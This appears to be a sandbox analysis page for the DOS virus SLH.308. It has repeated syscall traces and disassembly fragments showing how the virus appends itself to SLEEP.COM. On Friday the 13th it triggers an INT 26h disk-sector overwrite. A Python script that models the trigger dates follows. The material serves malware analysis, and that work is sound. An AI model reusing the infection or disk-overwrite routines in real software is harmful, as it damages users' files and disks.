Sample viewer

vx.netlux.org/Virus.DOS.SLH.308


GIF

Syscalls:

Time Syscall Op PC | Syscall Name (detail)
2018-12-17T22:33:21.493213164Z 26 PC: 13e60 | Set disk transfer address
2018-12-17T22:33:21.494812177Z 78 PC: 13e6a | Find first file
2018-12-17T22:33:21.500702653Z 61 PC: 13e75 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:33:21.507293804Z 63 PC: 13e81 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:33:21.523755286Z 66 PC: 13ea1 | Move file pointer
2018-12-17T22:33:21.525567968Z 44 PC: 13eac | Get time
0x13eac: or dx, dx
0x13eae: je 0x13ea8
0x13eb0: mov word ptr [bp + 0x238], dx
0x13eb4: call 0x13f4b
0x13eb7: mov ax, 0x4200
0x13eba: xor cx, cx
0x13ebc: xor dx, dx
0x13ebe: int 0x21
0x13ec0: mov ah, 0x40
0x13ec2: mov cx, 4
0x13ec5: lea dx, word ptr [bp + 0x205]
0x13ec9: int 0x21
0x13ecb: mov ah, 0x3e
0x13ecd: int 0x21
0x13ecf: jmp 0x13ed9
0x13ed1: mov ah, 0x3e
0x13ed3: int 0x21
0x13ed5: mov ah, 0x4f
0x13ed7: jmp 0x13e68
0x13ed9: mov dx, 0x80
2018-12-17T22:33:21.528887976Z 64 PC: 13f59 | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:33:21.543508177Z 66 PC: 13ec0 | Move file pointer
2018-12-17T22:33:21.545476455Z 64 PC: 13ecb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:33:21.55218944Z 62 PC: 13ecf | Close file
2018-12-17T22:33:21.560397077Z 26 PC: 13ee0 | Set disk transfer address
2018-12-17T22:33:21.56258858Z 42 PC: 13ee4 | Get date
0x13ee4: cmp al, 5
0x13ee6: jne 0x13f12
0x13ee8: cmp dl, 0xd
0x13eeb: jne 0x13f12
0x13eed: pushf
0x13eee: in al, 0x40
0x13ef0: mov ah, al
0x13ef2: in al, 0x40
0x13ef4: xchg ax, dx
0x13ef5: mov al, 2
0x13ef7: lea bx, word ptr [bp + 0x12a]
0x13efb: mov cx, 1
0x13efe: int 0x26
0x13f00: popf
0x13f01: mov ah, 2
0x13f03: xor bh, bh
0x13f05: mov dh, 0xc
0x13f07: mov dl, 0x20
0x13f09: int 0x10
0x13f0b: mov ah, 9
2018-12-17T22:33:21.565140885Z 48 PC: 12a4b | Get DOS version
2018-12-17T22:33:21.56622752Z 53 PC: 12b83 | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:33:21.568493647Z 53 PC: 12b90 | Get interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-17T22:33:21.569969458Z 53 PC: 12b9d | Get interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-17T22:33:21.571421945Z 53 PC: 12baa | Get interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-17T22:33:21.573776827Z 37 PC: 12bbe | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:33:21.575091811Z 74 PC: 12af3 | Reallocate memory
2018-12-17T22:33:21.577186981Z 68 PC: 1367f | I/O control for devices (Set for = '�� ')
2018-12-17T22:33:21.579937752Z 68 PC: 1367f | I/O control for devices (Set for = '� ��')
2018-12-17T22:33:21.582443619Z 64 PC: 137aa | Write file or device (Write 60 bytes on handle 1)
2018-12-17T22:33:21.587026762Z 64 PC: 137aa | Write file or device (Write 1 bytes on handle 1)
2018-12-17T22:33:21.590694105Z 64 PC: 137aa | Write file or device (Write 1 bytes on handle 1)
2018-12-17T22:33:21.595469848Z 64 PC: 137aa | Write file or device (Write 28 bytes on handle 1)
2018-12-17T22:33:21.598374675Z 64 PC: 137aa | Write file or device (Write 1 bytes on handle 1)
2018-12-17T22:33:21.601781898Z 64 PC: 137aa | Write file or device (Write 1 bytes on handle 1)
2018-12-17T22:33:21.606397591Z 37 PC: 12bca | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-17T22:33:21.607721569Z 37 PC: 12bd5 | Set interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-17T22:33:21.610253467Z 37 PC: 12be0 | Set interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-17T22:33:21.611568223Z 37 PC: 12beb | Set interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-17T22:33:21.612702443Z 76 PC: 12b74 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5967,"SideJobID":0}


GIF

Syscalls:

Time Syscall Op PC | Syscall Name (detail)
2018-12-25T11:58:09.766575731Z 26 PC: 13e60 | Set disk transfer address
2018-12-25T11:58:09.772897286Z 78 PC: 13e6a | Find first file
2018-12-25T11:58:09.79130905Z 61 PC: 13e75 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:09.799325144Z 63 PC: 13e81 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:09.821323502Z 66 PC: 13ea1 | Move file pointer
2018-12-25T11:58:09.829826274Z 44 PC: 13eac | Get time
0x13eac: or dx, dx
0x13eae: je 0x13ea8
0x13eb0: mov word ptr [bp + 0x238], dx
0x13eb4: call 0x13f4b
0x13eb7: mov ax, 0x4200
0x13eba: xor cx, cx
0x13ebc: xor dx, dx
0x13ebe: int 0x21
0x13ec0: mov ah, 0x40
0x13ec2: mov cx, 4
0x13ec5: lea dx, word ptr [bp + 0x205]
0x13ec9: int 0x21
0x13ecb: mov ah, 0x3e
0x13ecd: int 0x21
0x13ecf: jmp 0x13ed9
0x13ed1: mov ah, 0x3e
0x13ed3: int 0x21
0x13ed5: mov ah, 0x4f
0x13ed7: jmp 0x13e68
0x13ed9: mov dx, 0x80
2018-12-25T11:58:09.832468682Z 64 PC: 13f59 | Write file or device (Write 308 bytes on handle 5)
2018-12-25T11:58:09.866653734Z 66 PC: 13ec0 | Move file pointer
2018-12-25T11:58:09.869644131Z 64 PC: 13ecb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:09.876483858Z 62 PC: 13ecf | Close file
2018-12-25T11:58:09.884020521Z 26 PC: 13ee0 | Set disk transfer address
2018-12-25T11:58:09.885820231Z 42 PC: 13ee4 | Get date
0x13ee4: cmp al, 5
0x13ee6: jne 0x13f12
0x13ee8: cmp dl, 0xd
0x13eeb: jne 0x13f12
0x13eed: pushf
0x13eee: in al, 0x40
0x13ef0: mov ah, al
0x13ef2: in al, 0x40
0x13ef4: xchg ax, dx
0x13ef5: mov al, 2
0x13ef7: lea bx, word ptr [bp + 0x12a]
0x13efb: mov cx, 1
0x13efe: int 0x26
0x13f00: popf
0x13f01: mov ah, 2
0x13f03: xor bh, bh
0x13f05: mov dh, 0xc
0x13f07: mov dl, 0x20
0x13f09: int 0x10
0x13f0b: mov ah, 9
2018-12-25T11:58:09.887566551Z 48 PC: 12a4b | Get DOS version
2018-12-25T11:58:09.889081717Z 53 PC: 12b83 | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:09.891871309Z 53 PC: 12b90 | Get interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-25T11:58:09.894073132Z 53 PC: 12b9d | Get interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-25T11:58:09.89568781Z 53 PC: 12baa | Get interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-25T11:58:09.904551683Z 37 PC: 12bbe | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:09.906842325Z 74 PC: 12af3 | Reallocate memory
2018-12-25T11:58:09.909312822Z 68 PC: 1367f | I/O control for devices (Set for = '�� ')
2018-12-25T11:58:09.911612431Z 68 PC: 1367f | I/O control for devices (See above)
2018-12-25T11:58:09.918552621Z 64 PC: 137aa | Write file or device (Write 60 bytes on handle 1)
2018-12-25T11:58:09.922420836Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:09.92457658Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:09.928277705Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:09.930926165Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:09.933078098Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:09.937482585Z 37 PC: 12bca | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:09.938660772Z 37 PC: 12bd5 | Set interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-25T11:58:09.939852439Z 37 PC: 12be0 | Set interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-25T11:58:09.941607454Z 37 PC: 12beb | Set interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-25T11:58:09.942643353Z 76 PC: 12b74 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5967,"SideJobID":0}


GIF

Syscalls:

Time Syscall Op PC | Syscall Name (detail)
2018-12-25T11:58:09.800634896Z 26 PC: 13e60 | Set disk transfer address
2018-12-25T11:58:09.802477361Z 78 PC: 13e6a | Find first file
2018-12-25T11:58:09.806502655Z 61 PC: 13e75 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:09.811196415Z 63 PC: 13e81 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:09.815969798Z 66 PC: 13ea1 | Move file pointer
2018-12-25T11:58:09.817081285Z 44 PC: 13eac | Get time
0x13eac: or dx, dx
0x13eae: je 0x13ea8
0x13eb0: mov word ptr [bp + 0x238], dx
0x13eb4: call 0x13f4b
0x13eb7: mov ax, 0x4200
0x13eba: xor cx, cx
0x13ebc: xor dx, dx
0x13ebe: int 0x21
0x13ec0: mov ah, 0x40
0x13ec2: mov cx, 4
0x13ec5: lea dx, word ptr [bp + 0x205]
0x13ec9: int 0x21
0x13ecb: mov ah, 0x3e
0x13ecd: int 0x21
0x13ecf: jmp 0x13ed9
0x13ed1: mov ah, 0x3e
0x13ed3: int 0x21
0x13ed5: mov ah, 0x4f
0x13ed7: jmp 0x13e68
0x13ed9: mov dx, 0x80
2018-12-25T11:58:09.818667818Z 64 PC: 13f59 | Write file or device (Write 308 bytes on handle 5)
2018-12-25T11:58:11.536115572Z 66 PC: 13ec0 | Move file pointer
2018-12-25T11:58:11.537601969Z 64 PC: 13ecb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:11.543815758Z 62 PC: 13ecf | Close file
2018-12-25T11:58:11.5703054Z 26 PC: 13ee0 | Set disk transfer address
2018-12-25T11:58:11.572178239Z 42 PC: 13ee4 | Get date
0x13ee4: cmp al, 5
0x13ee6: jne 0x13f12
0x13ee8: cmp dl, 0xd
0x13eeb: jne 0x13f12
0x13eed: pushf
0x13eee: in al, 0x40
0x13ef0: mov ah, al
0x13ef2: in al, 0x40
0x13ef4: xchg ax, dx
0x13ef5: mov al, 2
0x13ef7: lea bx, word ptr [bp + 0x12a]
0x13efb: mov cx, 1
0x13efe: int 0x26
0x13f00: popf
0x13f01: mov ah, 2
0x13f03: xor bh, bh
0x13f05: mov dh, 0xc
0x13f07: mov dl, 0x20
0x13f09: int 0x10
0x13f0b: mov ah, 9
2018-12-25T11:58:11.575209719Z 48 PC: 12a4b | Get DOS version
2018-12-25T11:58:11.578269785Z 53 PC: 12b83 | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:11.580361843Z 53 PC: 12b90 | Get interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-25T11:58:11.581577855Z 53 PC: 12b9d | Get interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-25T11:58:11.583073468Z 53 PC: 12baa | Get interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-25T11:58:11.592809714Z 37 PC: 12bbe | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:11.593971007Z 74 PC: 12af3 | Reallocate memory
2018-12-25T11:58:11.595828669Z 68 PC: 1367f | I/O control for devices (Set for = '�� ')
2018-12-25T11:58:11.59968235Z 68 PC: 1367f | I/O control for devices (See above)
2018-12-25T11:58:11.601981747Z 64 PC: 137aa | Write file or device (Write 60 bytes on handle 1)
2018-12-25T11:58:11.606574918Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:11.610275929Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:11.615861643Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:11.618658094Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:11.623478366Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:11.627929625Z 37 PC: 12bca | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:11.629325457Z 37 PC: 12bd5 | Set interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-25T11:58:11.631779735Z 37 PC: 12be0 | Set interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-25T11:58:11.633182174Z 37 PC: 12beb | Set interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-25T11:58:11.634597119Z 76 PC: 12b74 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5967,"SideJobID":0}


GIF

Syscalls:

Time Syscall Op PC | Syscall Name (detail)
2018-12-25T11:58:09.806954784Z 26 PC: 13e60 | Set disk transfer address
2018-12-25T11:58:09.809529416Z 78 PC: 13e6a | Find first file
2018-12-25T11:58:09.816907201Z 61 PC: 13e75 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:09.824674781Z 63 PC: 13e81 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:58:09.8324428Z 66 PC: 13ea1 | Move file pointer
2018-12-25T11:58:09.835122181Z 44 PC: 13eac | Get time
0x13eac: or dx, dx
0x13eae: je 0x13ea8
0x13eb0: mov word ptr [bp + 0x238], dx
0x13eb4: call 0x13f4b
0x13eb7: mov ax, 0x4200
0x13eba: xor cx, cx
0x13ebc: xor dx, dx
0x13ebe: int 0x21
0x13ec0: mov ah, 0x40
0x13ec2: mov cx, 4
0x13ec5: lea dx, word ptr [bp + 0x205]
0x13ec9: int 0x21
0x13ecb: mov ah, 0x3e
0x13ecd: int 0x21
0x13ecf: jmp 0x13ed9
0x13ed1: mov ah, 0x3e
0x13ed3: int 0x21
0x13ed5: mov ah, 0x4f
0x13ed7: jmp 0x13e68
0x13ed9: mov dx, 0x80
2018-12-25T11:58:09.838148241Z 64 PC: 13f59 | Write file or device (Write 308 bytes on handle 5)
2018-12-25T11:58:09.85519358Z 66 PC: 13ec0 | Move file pointer
2018-12-25T11:58:09.857853182Z 64 PC: 13ecb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:58:09.865810184Z 62 PC: 13ecf | Close file
2018-12-25T11:58:09.88262834Z 26 PC: 13ee0 | Set disk transfer address
2018-12-25T11:58:09.885375467Z 42 PC: 13ee4 | Get date
0x13ee4: cmp al, 5
0x13ee6: jne 0x13f12
0x13ee8: cmp dl, 0xd
0x13eeb: jne 0x13f12
0x13eed: pushf
0x13eee: in al, 0x40
0x13ef0: mov ah, al
0x13ef2: in al, 0x40
0x13ef4: xchg ax, dx
0x13ef5: mov al, 2
0x13ef7: lea bx, word ptr [bp + 0x12a]
0x13efb: mov cx, 1
0x13efe: int 0x26
0x13f00: popf
0x13f01: mov ah, 2
0x13f03: xor bh, bh
0x13f05: mov dh, 0xc
0x13f07: mov dl, 0x20
0x13f09: int 0x10
0x13f0b: mov ah, 9
2018-12-25T11:58:09.889419132Z 9 PC: 13f12 | Display string (Could not find end pointer)
2018-12-25T11:58:10.031547668Z 48 PC: 12a4b | Get DOS version
2018-12-25T11:58:10.034285454Z 53 PC: 12b83 | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:10.035741141Z 53 PC: 12b90 | Get interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-25T11:58:10.037400518Z 53 PC: 12b9d | Get interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-25T11:58:10.041912817Z 53 PC: 12baa | Get interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-25T11:58:10.043537129Z 37 PC: 12bbe | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:10.045489473Z 74 PC: 12af3 | Reallocate memory
2018-12-25T11:58:10.048180233Z 68 PC: 1367f | I/O control for devices (Set for = '�� ')
2018-12-25T11:58:10.052137726Z 68 PC: 1367f | I/O control for devices (See above)
2018-12-25T11:58:10.055456237Z 64 PC: 137aa | Write file or device (Write 60 bytes on handle 1)
2018-12-25T11:58:10.063017342Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:10.067301734Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:10.073378404Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:10.086860131Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:10.091408131Z 64 PC: 137aa | Write file or device (See above)
2018-12-25T11:58:10.104676022Z 37 PC: 12bca | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T11:58:10.107027767Z 37 PC: 12bd5 | Set interrupt vector (Interrupt = '4' AKA 'Auxiliary output')
2018-12-25T11:58:10.109634092Z 37 PC: 12be0 | Set interrupt vector (Interrupt = '5' AKA 'Printer output')
2018-12-25T11:58:10.111014458Z 37 PC: 12beb | Set interrupt vector (Interrupt = '6' AKA 'Direct console I/O')
2018-12-25T11:58:10.112363193Z 76 PC: 12b74 | Terminate with return code (Return code = '1')
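The runs above differ only in the date the sandbox clock was set to (the JSON line after each run), and the disassembly after "Get date" shows why that matters: INT 21h/AH=2Ah returns the day of week in AL (0 = Sunday) and the day of month in DL, and the code only reaches the INT 26h absolute disk write when AL is 5 and DL is 0Dh. The script below is an added example, not part of the sample viewer or of the sample itself: it parses the trace rows and run-configuration lines (copied from the first three runs), reconstructs the infection sequence on the victim's handle, and applies that comparison to each run date. Function names, regexes and the `friday_13ths` helper are mine.

```python
"""Parse the sandbox syscall trace and evaluate the date trigger it shows.
Added example; the embedded rows and JSON lines are copied from the page,
everything else (names, parsing, the DOS register model) is mine."""
import datetime as dt
import json
import re

# One trace row: "<ISO time> <op> PC: <hex> | <name> (<detail>)".
# Disassembly lines such as "0x13eae: je 0x13ea8" do not match and are skipped.
_ROW = re.compile(
    r"^(?P<ts>\S+Z)\s+(?P<op>\d+)\s+PC:\s*(?P<pc>[0-9a-fA-F]+)\s*\|\s*"
    r"(?P<name>.*?)(?:\s*\((?P<detail>.*)\))?\s*$")

# Constructed sample: rows copied from the first run on the page.
TRACE = """\
2018-12-17T22:33:21.493213164Z 26 PC: 13e60 | Set disk transfer address
2018-12-17T22:33:21.494812177Z 78 PC: 13e6a | Find first file
2018-12-17T22:33:21.500702653Z 61 PC: 13e75 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:33:21.507293804Z 63 PC: 13e81 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:33:21.523755286Z 66 PC: 13ea1 | Move file pointer
2018-12-17T22:33:21.525567968Z 44 PC: 13eac | Get time 0x13eac: or dx, dx
0x13eae: je 0x13ea8
2018-12-17T22:33:21.528887976Z 64 PC: 13f59 | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:33:21.543508177Z 66 PC: 13ec0 | Move file pointer
2018-12-17T22:33:21.545476455Z 64 PC: 13ecb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:33:21.55218944Z 62 PC: 13ecf | Close file
2018-12-17T22:33:21.560397077Z 26 PC: 13ee0 | Set disk transfer address
2018-12-17T22:33:21.56258858Z 42 PC: 13ee4 | Get date 0x13ee4: cmp al, 5
2018-12-17T22:33:21.582443619Z 64 PC: 137aa | Write file or device (Write 60 bytes on handle 1)
"""
# Constructed sample: the run-configuration lines of the first three runs.
RUN_CONFIGS = [
    '{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5967,"SideJobID":0}',
    '{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5967,"SideJobID":0}',
    '{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5967,"SideJobID":0}',
]

def parse_row(line):
    """Return a dict for one syscall row, or None for any other line."""
    m = _ROW.match(line.strip())
    if not m:
        return None
    row = m.groupdict()
    row["op"] = int(row["op"])
    row["pc"] = int(row["pc"], 16)
    # The viewer fuses the first disassembled instruction onto the row;
    # drop it so the name is just "Get time" / "Get date".
    row["name"] = re.sub(r"\s+0x[0-9a-fA-F]+:.*$", "", row["name"]).strip()
    return row

def parse_trace(text):
    return [r for r in map(parse_row, text.splitlines()) if r]

def infection_summary(rows):
    """Reconstruct the appending-infector sequence: open the victim, read its
    first bytes, seek, write the body, seek back, write the replacement
    header, close.  Returns the victim, its handle and the write sizes on
    that handle (308 = body, 4 = patched entry)."""
    victim = handle = None
    writes = []
    for r in rows:
        d = r["detail"] or ""
        if r["name"] == "Open file":
            victim = re.search(r"Filename = '([^']*)'", d).group(1)
        elif r["name"] == "Read file or device" and handle is None:
            m = re.search(r"Read (\d+) bytes on handle (\d+)", d)
            if m:
                handle = int(m.group(2))
        elif r["name"] == "Write file or device":
            m = re.search(r"Write (\d+) bytes on handle (\d+)", d)
            if m and int(m.group(2)) == handle:
                writes.append(int(m.group(1)))
        elif r["name"] == "Close file":
            break
    return {"victim": victim, "handle": handle, "writes": writes}

def dos_get_date(day):
    """Model the registers INT 21h/AH=2Ah returns: AL = day of week with
    0 = Sunday, DL = day of month.  Python's weekday() uses Monday = 0."""
    return (day.weekday() + 1) % 7, day.day

def trigger_fires(day):
    """The branch logic after 'Get date' in the trace:
         cmp al, 5   / jne skip   ; AL must be 5 = Friday
         cmp dl, 0Dh / jne skip   ; DL must be 13
    Only then is the INT 26h (absolute disk write: AL=2 -> drive C:, CX=1
    sector, DX = a value read from PIT port 40h) reached."""
    al, dl = dos_get_date(day)
    return al == 5 and dl == 0x0D

def run_date(config_line):
    """Sandbox run-configuration line -> the date the run was clocked at."""
    c = json.loads(config_line)
    return dt.date(c["Year"], c["Month"], c["Day"])

def classify_runs(config_lines):
    return [(run_date(l), trigger_fires(run_date(l))) for l in config_lines]

def friday_13ths(first_year, last_year):
    """Dates in [first_year, last_year] on which the payload would fire;
    handy for picking the sandbox clock of a retest."""
    return [dt.date(y, m, 13) for y in range(first_year, last_year + 1)
            for m in range(1, 13) if trigger_fires(dt.date(y, m, 13))]

if __name__ == "__main__":
    print(infection_summary(parse_trace(TRACE)))
    for day, fires in classify_runs(RUN_CONFIGS):
        print(day, "AL,DL =", dos_get_date(day), "payload" if fires else "no payload")
```

Of the three configured dates, 1980-01-01 is a Tuesday, 1980-01-04 is a Friday that is not the 13th, and 1980-06-13 is a Friday the 13th, so only the third run satisfies both compares. Note that INT 26h is not an INT 21h service, so the viewer's syscall list will not show the sector write itself even on a run where it fires; the absence of a row after "Get date" is not evidence that the payload path was skipped.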